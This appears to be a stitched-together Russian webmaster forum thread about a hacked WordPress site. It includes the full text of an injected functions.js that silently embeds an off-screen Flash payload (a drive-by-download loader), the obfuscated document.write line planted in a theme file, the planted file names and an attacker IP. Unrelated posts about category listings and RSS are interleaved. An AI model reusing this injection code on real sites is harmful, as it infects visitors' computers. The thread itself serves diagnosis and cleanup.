jino.ru.
Хз.
16.11.13 на сайте антивирус avast обнаружил вирус, в файле functions.js.
Вот содержимое файла:
function addNewObject(){try{var ua=navigator.userAgent.toLowerCase();if((ua.indexOf("chrome")==-1&&ua.indexOf("win")!=-1)&&navigator.javaEnabled()){var counter="/wp-includes/images/crystal/video.swf";var div=document.createElement('div');div.innerHTML='<object id="dummy" name="dummy" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="1" height="1">';div.innerHTML+='<param name="allowScriptAccess" value="always" \/>';div.innerHTML+='<param name="movie" value="'+counter+'" \/>';div.innerHTML+='<embed id="dummy2" name="dummy2" src="'+counter+'" width="1" height="1" name="flash" allowScriptAccess="always" type="application\/x-shockwave-flash" \/>';div.innerHTML+='<\/object>';div.style.position='absolute';div.style.left='-100px';div.style.top='-100px';document.body.insertBefore(div,document.body.children[0]);}}catch(e){if(document.body==undefined||document.body.children[0]==undefined){setTimeout('addNewObject()',50);}}};addNewObject();
Данный файл использовал файл video.swf.
Ссылка на functions.js.(его вызов) была прописана в navigation.js, в виде кода ;
document.write("<scr"+"ipt src='/wp-includes/images/smilies/functions.js'><"+"/script>");
Файлы
wp-includes\images\smilies\functions.js
wp-includes\images\crystal\video.swf
и ссылка document.write("<scr"+"ipt src='/wp-includes/images/smilies/functions.js'><"+"/script>"); из файла wp-content\themes\twentytwelve\js\navigation.js были удалены.
В оригинальной теме не было файла wp-includes\images\crystal\video.php, он был также удален.
1. Не по теме.
2. Не конструктивно (нет цены и условий)
3. Ставлю и администрирую не первый сайт, на разных движках, такое явление впервые, самому таки интересно побороть..
Вирус так и не смог удалить, т.к. после вырезки кодов, сайт частично утратил функционал. Восстановил из резервной копии. Сайт существенно утратил позиции Яндекс и Гугл, посещаемость упала более чем в 50 раз. Старые статьи пока не проиндексированы.
Вывод: вирус чрезвычайно эффективен, с точки зрения борьбы с конкурентами.
Слежу за изменяющимися файлами.
10.11 пока неизвестно как были добавлены файлы:
Файл Измененные Хеш файла
wp-content/languages/admin-ru_RU.php Sunday November 10th, 2013 at 9:49 am UTC 284a7a416f8d7fb14679b6e3f7fe5b4f
wp-content/themes/twentyeleven/config.inc.php Sunday November 10th, 2013 at 9:49 am UTC b8a36114ad041c405754a42bd374967e
wp-content/themes/twentyten/config.inc.php Sunday November 10th, 2013 at 9:49 am UTC 93cdc259c3d1d1eb19bac5439940f062
Удалил их вручную.
11.11. заблокировал сайт, который пытался открыть удаленные файлы:
110.85.101.152(you can check the host at http://ip-adress.com/ip_tracer/110.85.101.152).
По умолчанию, темы статей в категориях выводятся сверху текста статей.
Т.е. сначала заглавие, затем текст.
А хочется, чтобы выводились списком названия тем, а по нажатию на тему, появлялась сама статья.
Например, в рубрике Страхование 113 тем http://pravogroup.ru/category/strahovanie/
Вывод только названий тем, существенно облегчит поиск.
Жаль, нет кнопки спасибо. 🍻🍻😎😎
Поведение совпадает с эвристическими правилами, характерными для drive-by-download атак.
Я понял нашли просто глазками, без программ.
Мне не ясно, я его приложил к письму, как он работает?
Интересно было бы удалить вредноносный код. Планировал вырезать указанные Вами скрипты.
Попросил хостера направить мне логи изменений по FTP, SSH и HTML.
После изучения планирую: заблокировать по ip хакеров, логи выложу сюда, возможно, закрою FTP и поменяю права, там видно будет.
/ru/forum/comment/12232785
После Вердикт
10.10.2013
Большое спасибо, что глянули.😎🍻
Это вирус или только подозрение?
Как Вы это нашли?
Как эти скрипты проявляют себя, чем опасны?
Почему Яша ссылается чутко на другие каталоги?
Вирус Troj/JSRedir-MH
В период с 9.10.13 Яндекс блокирует сайт.
Сайт pravogroup.ru может быть опасен для вашего
компьютера
Что произошло
Яндекс обнаружил на этом сайте вредоносный программный код, который может заразить ваш
компьютер вирусом или получить доступ к вашей личной информации.
Яндекс периодически проверяет страницы сайтов. Последняя проверка (менее двух дней
назад) показала, что на сайте размещён вредоносный код. Это могло произойти как по
желанию владельцев сайта, так и без их ведома — в результате действий злоумышленников.
Если при следующей проверке код не будет обнаружен, Яндекс перестанет размечать сайт в
результатах поиска как опасный.
Вредоносный код:
содержит Troj/JSRedir-MH (по данным компании Sophos).
Результат выборочной проверки
Дата последней проверки
Страница
Вердикт
http://pravogroup.ru/2013/01/05/podpisan-paket-zakonov-o-povyishenii-sudeyskih-zarplat/
Поведенческий анализ
http://pravogroup.ru/2013/01/15/reestr-problemnyih-zastroyshhikov-na-29-dekabrya-2012-goda/
http://pravogroup.ru/2013/02/06/segodnya-mosgorsud-otmenil-reshenie-zamoskvoretskogo-suda-stolitsyi-ot-10-sentyabrya-2012-goda-o-vyiplate-izvestnomu-akteru-teatra-lenkom-andreyu-sokolovu-kompensatsii-v-razmere-12-mln-rubley-za-k/
http://pravogroup.ru/2013/03/13/rukovoditeley-upravyi-babushkinskogo-rayona-moskvyi-podozrevayutsya-v-afere-povlekshey-hishhenie-byudzhetnyih-sredstv-v-osobo-krupnom-razmere-soobshhaet-itar-tass-so-ssyilkoy-na-mvd-rf/
Хостер jino.ru пишет: Вирусных скриптов, как и ошибок в работе сервисов, не выявили.
Обратитесь к технической поддержке яндекса для повторной проверки сайта.
Повторная проверка дала тот же результат.
Проверял сайт dr.web ом, вирусов не выявил.
Визуально вирусов не видно.
Тему прочел. Конструктивно: /ru/forum/comment/12116722
/ru/forum/comment/12084019
Восстанавливать бэкапы, менять права и прописывать доступ не вопрос, но, подскажите, плиз, где вирусы?
Когда я им писал, у меня было больше 10.
RSS бы вполне устроило, раздаю через него новости на форумы.
На vk прикрутить масла не хватает.
Саппорт на просьбу прикрутить отмалчивается.
Научите, плиз, не дайте умереть дураком.
